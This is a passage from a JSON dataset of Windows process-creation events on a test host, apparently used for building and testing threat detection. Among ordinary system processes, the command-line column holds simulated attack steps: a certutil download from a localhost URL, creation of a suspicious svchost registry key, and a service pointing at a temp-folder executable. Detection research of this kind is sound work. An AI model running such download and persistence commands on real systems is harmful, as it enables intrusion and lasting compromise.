0x0110:40\",\"mt.exe port\",\"mt.exe smb\",\"hd.exe -pslist\",\"hd.exe -enum\",\"netsh.exe PortOpenning\",\"certutil -urlcache -split -f http://127.0.0.1/ \",\".\\\\reg add \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Svchost\\\\MyNastySvcHostConfig\\\"\",\".\\\\reg delete \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Svchost\\\\MyNastySvcHostConfig\\\"\",\"sc create MSTICTestService binPath=C:\\\\Users\\\\MSTICA~1\\\\AppData\\\\Local\\\\Temp\\\\hd.exe DisplayName=\\\"Test Service\\\"\",\"sc delete MSTICTestService\",\"taskhostw.exe SYSTEM\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\system32\\\\wermgr.exe -upload\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\system32\\\\MusNotification.exe Display\",\"nan\",\"C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\"C:\\\\Windows\\\\system32\\\\svchost.exe -k wsappx\",\"C:\\\\Windows\\\\System32\\\\svchost.exe -k WerSvcGroup\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"nan\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"nan\",\"dism /online /enable-feature /featurename:File-Services /NoRestart\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\TEMP\\\\CC563BBE-DE32-44D3-8E35-F3FC78E72E40\\\\dismhost.exe {D57BA872-53C0-424D-80AE-E49112D1CF04}\"],\"Computer\":[\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\"],\"EffectiveLogonId\":[\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e7\",\"0x3e4\",\"0x3e7\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e7\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e5\",\"0x3e4\",\"0x3e4\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e4\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\"],\"EffectiveLogonId_par\":[\"NaN\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"NaN\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"NaN\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"NaN\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"NaN\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"NaN\",\"0x3e7\",\"0x3e7\",\"0x3e7\"],\"EventID\":[\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\